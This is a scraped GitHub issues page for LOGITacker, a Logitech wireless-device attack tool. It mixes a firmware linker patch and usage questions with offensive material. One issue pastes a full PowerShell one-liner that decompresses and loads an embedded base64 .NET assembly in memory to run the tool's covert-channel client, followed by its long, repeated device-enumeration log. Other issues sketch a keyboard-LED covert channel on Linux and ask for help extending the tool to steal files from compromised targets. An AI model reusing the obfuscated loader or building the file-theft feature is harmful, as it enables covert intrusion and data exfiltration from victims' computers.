rogandawes / logitacker Goto Github PK
View Code? Open in Web Editor NEWEnumerate and test Logitech wireless input devices for vulnerabilities with a nRF52840 radio dongle.
License: GNU General Public License v3.0
Enumerate and test Logitech wireless input devices for vulnerabilities with a nRF52840 radio dongle.
License: GNU General Public License v3.0
Hi,
I have investigated a way to get a covert channel for Linux systems. As most actions require higher privileges (like root) there is now way to use them (eg. send raw HID messages to a input device).
My approach is to use plain user privileges to set keyboard LEDs:
for i in $(seq 1 32); do xset -led $i led on; done
or
for i in $(seq 1 32); do xset -led $i led off; done
A quick look shows some output in LOGITacker:
<info> LOGITACKER_USB: hid kbd evt: APP_USBD_HID_USER_EVT_OUT_REPORT_READY
<info> LOGITACKER_USB: 00 05 |..
<info> LOGITACKER_USB: hid kbd evt: APP_USBD_HID_USER_EVT_OUT_REPORT_READY
<info> LOGITACKER_USB: 00 01 |..
I think there may be some chance to implement some sort of information channel. If some LEDs would be used for some kind of modulation scheme the output stream of a shell could be transmitted this way. This may work similar to the Windows version of the covert channel, implemented already.
An attempt was made to run the covert_channel powershell code. It didn't work.
This was tested on a recent 1909 Windows 10 system.
$b="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";nal no New-Object -F;$m=no IO.MemoryStream;$a=no byte[] 1024;$gz=(no IO.Compression.GZipStream((no IO.MemoryStream -ArgumentList @(,[Convert]::FromBase64String($b))), [IO.Compression.CompressionMode]::Decompress));$n=0;do{$n=$gz.Read($a,0,$a.Length);$m.Write($a,0,$n)}while ($n -gt 0);[System.Reflection.Assembly]::Load($m.ToArray());[LogitackerClient.Runner]::Run()
GAC Version Location
False v2.0.50727
Start shell and wait for traffic on Unifying receiver...
Path: \?\hid#vid_1532&pid_0043&mi_01&col01#7&25c2db31&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_01#7&1d4f9d7a&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 65, Output: 65
Path: \?\hid#virtualdevice&10&col04#2&3457a17c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#virtualdevice&10&col05#2&3457a17c&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 3, Output: 0
Path: \?\hid#virtualdevice&10&col02#2&3457a17c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_00#7&1eb9d6f&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col02#7&25c2db31&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_01&col03#7&25c2db31&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_02#7&39588f8&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col04#7&25c2db31&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col02#7&a1f813c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_00#7&3491f60b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col05#7&25c2db31&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col01#7&a1f813c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#virtualdevice&10&col03#2&3457a17c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col03#7&a1f813c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col01#7&10bab849&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col04#7&a1f813c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col02#7&10bab849&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col03#7&10bab849&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 2, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col04#7&10bab849&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 7, Output: 7
Path: \?\hid#vid_046d&pid_c534&mi_01&col05#7&10bab849&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 20, Output: 20
Path: \?\hid#virtualdevice&10&col01#2&3457a17c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col01#7&25c2db31&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_01#7&1d4f9d7a&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 65, Output: 65
Path: \?\hid#virtualdevice&10&col04#2&3457a17c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#virtualdevice&10&col05#2&3457a17c&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 3, Output: 0
Path: \?\hid#virtualdevice&10&col02#2&3457a17c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_00#7&1eb9d6f&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col02#7&25c2db31&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_01&col03#7&25c2db31&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_02#7&39588f8&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col04#7&25c2db31&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col02#7&a1f813c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_00#7&3491f60b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col05#7&25c2db31&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col01#7&a1f813c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#virtualdevice&10&col03#2&3457a17c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col03#7&a1f813c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col01#7&10bab849&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col04#7&a1f813c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col02#7&10bab849&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col03#7&10bab849&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 2, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col04#7&10bab849&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 7, Output: 7
Path: \?\hid#vid_046d&pid_c534&mi_01&col05#7&10bab849&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 20, Output: 20
Path: \?\hid#virtualdevice&10&col01#2&3457a17c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col01#7&25c2db31&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_01#7&1d4f9d7a&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 65, Output: 65
Path: \?\hid#virtualdevice&10&col04#2&3457a17c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#virtualdevice&10&col05#2&3457a17c&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 3, Output: 0
Path: \?\hid#virtualdevice&10&col02#2&3457a17c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_00#7&1eb9d6f&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col02#7&25c2db31&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_01&col03#7&25c2db31&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_02#7&39588f8&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col04#7&25c2db31&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col02#7&a1f813c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_00#7&3491f60b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col05#7&25c2db31&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col01#7&a1f813c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#virtualdevice&10&col03#2&3457a17c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col03#7&a1f813c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col01#7&10bab849&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col04#7&a1f813c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col02#7&10bab849&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col03#7&10bab849&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 2, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col04#7&10bab849&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 7, Output: 7
Path: \?\hid#vid_046d&pid_c534&mi_01&col05#7&10bab849&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 20, Output: 20
Path: \?\hid#virtualdevice&10&col01#2&3457a17c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col01#7&25c2db31&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_01#7&1d4f9d7a&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 65, Output: 65
Path: \?\hid#virtualdevice&10&col04#2&3457a17c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#virtualdevice&10&col05#2&3457a17c&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 3, Output: 0
Path: \?\hid#virtualdevice&10&col02#2&3457a17c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_00#7&1eb9d6f&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col02#7&25c2db31&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_01&col03#7&25c2db31&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_02#7&39588f8&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col04#7&25c2db31&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col02#7&a1f813c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_00#7&3491f60b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col05#7&25c2db31&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col01#7&a1f813c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#virtualdevice&10&col03#2&3457a17c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col03#7&a1f813c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col01#7&10bab849&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col04#7&a1f813c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col02#7&10bab849&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col03#7&10bab849&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 2, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col04#7&10bab849&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 7, Output: 7
Path: \?\hid#vid_046d&pid_c534&mi_01&col05#7&10bab849&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 20, Output: 20
Path: \?\hid#virtualdevice&10&col01#2&3457a17c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Exception calling "Run" with "0" argument(s): "Object reference not set to an instance of an object."
At line:1 char:7253
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
logitacker_aprdongle.zip
Here is a patch, to make LOGITacker work with the APR Brother Dongle (based on the pca10059 build)
hex and uf2 file attached in zip file
-- logitacker_pca10059.ld 2019-07-12 07:41:20.386670177 +0000
+++ logitacker_pca10059a.ld 2019-07-12 07:41:46.526489027 +0000
@@ -5,8 +5,8 @@
MEMORY
{
- FLASH (rx) : ORIGIN = 0x1000, LENGTH = 0xff000
- RAM (rwx) : ORIGIN = 0x20000008, LENGTH = 0x3fff8
+ FLASH (rx) : ORIGIN = 0x26000, LENGTH = 0xda000
+ RAM (rwx) : ORIGIN = 0x200022e0, LENGTH = 0x3dd20
}
SECTIONS
Via tests, I find that I can not download or steal files from target computer ,with no internet network and any other network.
After we get the cmd shell of target computer, I find that the process running on target computer is powershell.exe which started when injected.
Maybe we could improve the framework to upload and download small files between clent and target computer, just like meterpreter framework of others.
I don't know how to finish the work above, anyone can help me???
Queue of app_scheduler constantly full in promiscuous mode field test, crowded with traffic at 2.4GHz.
Possible solutions:
Assure all pending frames are processed (enable input present flag, even if no frame is enquired because buffer runs out)
I just follow this README, then downloaded nrfutil.exe and execute it.
But it has three firmware types, I am really a little confused. So anyone can give me some help?
As per the title, would be useful to be able to stop the discover scan as in a Logitech rich environment it can be difficult to see the output of the devices list :)
